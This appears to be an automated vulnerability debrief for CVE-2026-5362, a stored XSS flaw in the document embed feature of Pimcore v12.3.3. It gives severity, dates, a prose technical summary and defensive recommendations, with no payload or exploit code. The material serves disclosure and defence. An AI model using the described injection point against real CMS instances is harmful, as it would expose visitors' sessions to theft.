PatchSiren cyber security CVE debrief

CVE-2026-5362 pimcore CVE debrief

A stored cross-site scripting (XSS) vulnerability in Pimcore v12.3.3 allows authenticated attackers with document editing permissions to inject malicious HTML/JavaScript through the Document embed editable feature. The payload executes when published pages are rendered, potentially compromising session tokens or performing actions on behalf of victims. The CVSS 4.0 score of 4.8 (Medium) reflects network attack vector, low attack complexity, required privileges, and user interaction dependency. The vulnerability was published to NVD on 2026-04-27 and last modified on 2026-05-18. No known exploitation in ransomware campaigns has been documented.

Vendor: pimcore
Product: Unknown
CVSS: MEDIUM 4.8
CISA KEV: Not listed in stored evidence
Original CVE published: 2026-04-27
Original CVE updated: 2026-05-18
Advisory published: 2026-04-27
Advisory updated: 2026-05-18

Who should care

Organizations operating Pimcore v12.3.3 content management instances, particularly those with multi-user editorial workflows or externally facing published documentation. Security teams responsible for CMS hardening and web application firewall rule development.

Technical summary

The vulnerability exists in the Document embed editable component of Pimcore v12.3.3, where insufficient input sanitization allows authenticated users with edit permissions to persist arbitrary HTML and JavaScript. When embedded content is rendered on published pages without proper output encoding, the injected scripts execute in the context of viewers' browsers. This represents a stored XSS pattern requiring authenticated access but enabling persistent compromise of page visitors.

Defensive priority

medium

Recommended defensive actions

Review and restrict document editing permissions to minimize attack surface
Implement Content Security Policy (CSP) headers to mitigate script execution impact
Audit published documents for unauthorized embed content
Apply vendor patches when available, prioritizing production CMS instances
Monitor for anomalous document modifications by authenticated users

Evidence notes

CWE-79 (Improper Neutralization of Input During Web Page Generation) identified as primary weakness. Affected version confirmed as 12.3.3 via CPE criteria. Advisory source tagged as containing exploit information.

Official resources

CVE-2026-5362 CVE record
CVE.org
CVE-2026-5362 NVD detail
NVD
Source item URL
nvd_modified
Mitigation or vendor reference
[email protected] - Exploit, Third Party Advisory
Source reference
[email protected] - Product

Disclosed via NVD with third-party advisory from Fluid Attacks